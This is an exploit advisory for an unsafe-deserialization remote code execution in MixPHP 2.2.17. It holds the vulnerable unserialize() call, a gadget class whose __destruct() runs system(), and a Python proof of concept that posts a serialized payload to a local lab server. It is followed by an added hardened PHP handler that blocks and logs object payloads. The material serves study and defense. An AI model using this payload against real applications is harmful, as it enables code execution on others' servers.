# Exploit Title: MixPHP Framework 2.2.17 - Unsafe Deserialization Remote Code Execution
# Date: 2026-05-14
# Exploit Author: cardosource
# Vendor Homepage: https://github.com/mix-php/mix
# Software Link: https://github.com/mix-php/mix
# Version: 2.x through 2.2.17
# Tested on: Ubuntu 26.04 LTS / PHP 8.3.6
# CVE: CVE-2026-42471

"""
PHP applications that pass user-controlled input directly into unserialize() may be
vulnerable to arbitrary code execution when attacker-controlled gadget chains are
available. The following proof of concept demonstrates exploitation through a
reachable __destruct() magic method.

Vulnerable Code
===============

    $payload = $_POST["data"] ?? "";
    unserialize($payload);

Gadget
======

    class A {
        public $c = 'id>/tmp/p';
        public function __destruct() {
            system($this->c);
        }
    }

Lab Setup
=========

    php -S 0.0.0.0:8000
    python3 php_deserialization_rce.py
"""

import requests

target = "http://127.0.0.1:8000/index.php"

# Serialized instance of gadget class A; the declared string length (9)
# must match the byte length of the value assigned to property c.
payload = 'O:1:"A":1:{s:1:"c";s:9:"id>/tmp/p";}'

r = requests.post(target, data={"data": payload})
print(r.text)
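The hardened handler below is an added example (not from this advisory or the MixPHP project) showing the mitigation for the vulnerable call above: `allowed_classes => false` stops any application class, including the gadget, from being instantiated, and the decoded value is walked so that anything which still arrived as an object is rejected and logged. It assumes the same `$_POST['data']` entry point; where the data does not need PHP-specific types, `json_decode()` is the simpler replacement.

```php
<?php
// Added example, not part of the original advisory or the MixPHP code base.
// Assumes the handler receives the same $_POST["data"] field as the vulnerable snippet.

// Gadget class as described in the advisory. With the mitigation below it is
// never instantiated from user input, so its __destruct() cannot be reached.
class A {
    public $c = 'id>/tmp/p';
    public function __destruct() { system($this->c); }
}

// Recursively check whether a decoded value contains any object at all.
// With allowed_classes => false every object token becomes
// __PHP_Incomplete_Class, which is_object() still reports as an object.
function contains_object(mixed $v): bool
{
    if (is_object($v)) {
        return true;
    }
    if (is_array($v)) {
        foreach ($v as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

// Safe replacement for unserialize($payload). Returns the decoded scalar/array
// value, or null when the payload is malformed or smuggles an object.
function safe_unserialize(string $payload): mixed
{
    // No class may be instantiated during decoding, so no __wakeup()/__destruct()
    // of an application class can run regardless of what the payload names.
    $value = @unserialize($payload, ['allowed_classes' => false]);

    if ($value === false && $payload !== 'b:0;') {
        error_log('unserialize: malformed payload rejected');
        return null;
    }
    if (contains_object($value)) {
        // Detection signal worth alerting on: plain-data input carried an object.
        error_log('unserialize: payload containing an object rejected');
        return null;
    }
    return $value;
}

$decoded = safe_unserialize($_POST['data'] ?? '');
var_dump($decoded);
```

Fed the advisory's payload, this handler logs the rejection and returns null; a benign serialized array such as `a:1:{s:1:"k";s:1:"v";}` decodes normally.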